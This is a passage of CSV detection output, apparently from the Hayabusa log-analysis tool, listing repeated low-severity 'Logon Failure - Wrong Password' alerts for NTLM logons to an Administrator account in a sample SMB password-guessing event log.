NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UsPCJ0UlfH4urYrm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MIQlOetFByLZqPkT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c9IBZ0qTDlHWADZt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lmhkB39gKvvuT89e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4KPoZ8JB7WSjUCHW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:01.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0mwiPq4gF1YXkQSl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.615 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y5ncgrpwOFo7E8vg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.647 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KbkG8ezrAPFC0iKu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GW4WKkHocNadDzrb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: unbtFAiykcfKTbQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oRzF1s9XVoRmoFQ6 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9TO1c7eYd1IQHVwG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wsn5GM4BqEl6A6pY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pq350wqwVDQlTKu9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uMJWwjG7J2sOiBYd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3YusfxQQygi2x5Cu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:02.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6q29uj6ovfwz0riC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cj38VsqGLoQ8jGdf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TOW8OIO2vQRFaTID : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DfYITdZCYwEj9IJV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4BI6V35tZGZ1WGtJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wOF75n4aunKH9qxc : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jsTFTCnFFBkhG5jP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5qiwcKE2TQui2H8z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PZOCyXplWOCyKbFm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RhyaAhYB78nbh1Ig : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MIJU9xbr1klIvvdE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:02.506 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qLKVR3mW3g3utO4X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aNm4tVG8bV7e9gbB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JtU0PCr9K5DXFYV2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CH3BWNPEWlw52Gb6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vQTYqFKBz6YEWhF6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qkj3u8ODgLD7xQ5R : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r9uyze1uO0zuNNUM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.803 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UmL15i3edXHcUamI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x7xjFRjv9rDhiXJ6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6BmQhVEv8g7EKu1F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: upOMmG87cDO1NFg0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:02.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tO55KfkORhxFORvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D64wDbqkqmzWuUSa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sIDgNIlGA0cOkBOI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.082 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i0kXPQ6s7CGe4QGA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HW5jP389jmqSkzF1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: enhsof25BdDPcI2c : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4acsPMLUJRrT7mmL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hi1dzny6hpyr5N3d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RlPVBSnDMlE0QZaJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: th72TwMoRXtDVWge : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KGTTiJSkErjzoUUC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:03.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xyzZwNLltF0cYnai : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gYWVQ6mCqyBfDm3m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rg2x2lv9JeS5Bb6l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fU28NKC3WYxFGbMN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EUWDXgnogGDXizWj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXhAtnNcQKOIsuGS : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cKfrJwI3OGdjL4af : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VdekC160hU7YzrK9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: enOBuzd6jwu8rZCH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eAjLjDlZSps5D49t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rY6CONLBVygSTnY5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:03.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6FIHgz2yqqbD9zfV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d82RRXgSmZdnfa8I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xA3ZWnWc9CoGeKpm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FvSYKi8KvEtnmSbs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IvxXI1u0AwtNHNSU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OFIy6Cps3Rm87Kqf : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.135 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: slL3aPBnZl3lVJst : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O98P1oP3AU4lZp2D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EZZ7wIJNZ0CG7fMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7RhwHCqXQytvcaom : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xumaxbBEMZqL6pPO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:04.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ur1yZIwgB3ecNJGw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xAuGcKYRcLe0z3bl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmMi0edfBJ8KoJst : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlnoKbUb9jiqJD7t : IP Address: 192.168.198.149 : AuthPackage: 